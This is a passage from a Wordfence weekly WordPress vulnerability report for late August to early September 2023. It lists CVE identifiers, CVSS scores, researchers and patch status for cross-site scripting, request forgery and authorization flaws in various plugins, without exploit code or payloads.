Order Tracking Pro <= 3.3.6 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Order Tracking – WordPress Status Tracking Plugin
CVE ID: CVE-2023-4500
CVSS Score: 4.7 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/81f9a4c6-971f-4f6d-8bb1-e97bf75cf8d3

GuruWalk Affiliates <= 1.0.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: GuruWalk Affiliates
CVE ID: CVE-2023-27622
CVSS Score: 4.4 (Medium)
Researcher/s: Pavitra Tiwari
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2b2714f7-9877-4d3d-a692-70fbf8584728

SureCart <= 2.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: WordPress Ecommerce For Creating Fast Online Stores – By SureCart
CVE ID: CVE-2023-41241
CVSS Score: 4.4 (Medium)
Researcher/s: emad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/416c13ff-15ae-4ba4-8a95-7c07bec75c22

Smarty for WordPress <= 3.1.35 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Smarty for WordPress
CVE ID: CVE-2023-41661
CVSS Score: 4.4 (Medium)
Researcher/s: Prasanna V Balaji
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/498a10a1-8da6-4309-833f-950f6442d5ae

WP GoToWebinar <= 14.45 – Authenticated (Administrator+) Cross-Site Scripting

Affected Software: WP GoToWebinar
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4a7b32f5-5d27-4f5a-89f3-abf4f8da79e4

HollerBox <= 2.3.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox
CVE ID: CVE-2023-41657
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5c76871e-b774-4284-ad00-f8ef7f6df389

Popup Builder <= 4.1.15 – Authenticated (Admin+) Stored Cross-Site Scripting

Affected Software: Popup Builder – Create highly converting, mobile friendly marketing popups.
CVE ID: CVE-2023-3226
CVSS Score: 4.4 (Medium)
Researcher/s: Dipak Panchal
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7f97af51-1532-4034-8b2a-8356b65cb617

Snap Pixel <= 1.5.7 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Snap Pixel
CVE ID: CVE-2023-41242
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c37686f8-6bd7-4c06-b80a-7d6849bbc7b0

Easy Coming Soon <= 2.3 – Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings

Affected Software: Easy Coming Soon
CVE ID: CVE-2023-25483
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e46139c8-dd7e-4904-81b2-283952cea9b5

Popup Box <= 3.7.1 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Popup box
CVE ID: CVE Unknown
CVSS Score: 4.4 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e6dbbb52-4202-4d69-837f-c7d5ca06fab5

WP Users Media <= 4.2.3 – Cross-Site Request Forgery in wpusme_save_settings

Affected Software: WP Users Media
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Zlrqh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/07a82335-d738-4c14-b385-04843f12e4ef

Metform Elementor Contact Form Builder <= 3.3.1 – Authenticated (Subscriber+) Information Disclosure via ‘mf_first_name’ shortcode

Affected Software: Metform Elementor Contact Form Builder
CVE ID: CVE-2023-0689
CVSS Score: 4.3 (Medium)
Researcher/s: Ramuel Gall
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/356cf06e-16e7-438b-83b5-c8a52a21f903

Social Share Boost <= 4.5 – Cross-Site Request Forgery via ‘syntatical_settings_content’

Affected Software: Social Share Boost
CVE ID: CVE-2023-25033
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/53a265b8-e34c-4683-a653-4b4b2410e9de

Better Elementor Addons <= 1.3.5 – Missing Authorization

Affected Software: Better Elementor Addons
CVE ID: CVE-2023-41656
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5a628eef-937c-4391-afac-22128ec5b51c

WP Users Media <= 4.2.3 – Missing Authorization via wpusme_save_settings

Affected Software: WP Users Media
CVE ID: CVE-2023-27428
CVSS Score: 4.3 (Medium)
Researcher/s: Zlrqh
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8e125188-4aff-4c64-b4ec-a363db2431b7

WP Super Minify <= 1.5.1 – Cross-Site Request Forgery via ‘wpsmy_admin_options’

Affected Software: WP Super Minify
CVE ID: CVE-2023-27615
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/af59fcf6-4435-45f0-8904-ff520ea86157

Remove/hide Author, Date, Category Like Entry-Meta <= 2.1 – Cross-Site Request Forgery

Affected Software: Remove/hide Author, Date, Category Like Entry-Meta
CVE ID: CVE-2023-41650
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/cd0abdf2-24da-4e87-825b-0796af6c3ccd

MakeStories (for Google Web Stories) <= 2.8.0 – Cross-Site Request Forgery via ‘ms_set_options’

Affected Software: MakeStories (for Google Web Stories)
CVE ID: CVE-2023-27448
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d9f7130d-883a-4db4-9edf-f5526724de11

AffiliateWP <= 2.14.0 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Activation

Affected Software: AffiliateWP
CVE ID: CVE-2023-4600
CVSS Score: 4.3 (Medium)
Researcher/s: Lana Codes
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/eab422b8-8cf5-441e-a21f-6a0e1b7642b2

authLdap <= 2.5.8 – Cross-Site Request Forgery

Affected Software: authLdap
CVE ID: CVE-2023-41654
CVSS Score: 4.3 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/eddce6e0-2ea7-4980-97a7-857b2e1e3b69

WP Migration Plugin DB & Files – WP Synchro <= 1.9.1 – Cross-Site Request Forgery

Affected Software: WP Synchro – WordPress Migration Plugin for Database & Files
CVE ID: CVE-2023-41660
CVSS Score: 4.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f1b6f041-5ea6-48ca-9ca7-4ce96cbfa275

authLdap <= 2.5.8 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: authLdap
CVE ID: CVE-2023-41655
CVSS Score: 3.3 (Low)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5b91ad8b-79ec-4ef7-bb39-edb06309da5e

FileOrganizer <= 1.0.2 – Authenticated (Admin+) Arbitrary File Access

Affected Software: FileOrganizer – Manage WordPress and Website Files
CVE ID: CVE-2023-3664
CVSS Score: 2.7 (Low)
Researcher/s: Dmitrii
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/11c9124d-80e0-435d-9eb4-901c4f481a6f

As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.

This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us using our CVE Request form, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.

The post Wordfence Intelligence Weekly WordPress Vulnerability Report (August 28, 2023 to September 3, 2023) appeared first on Wordfence.
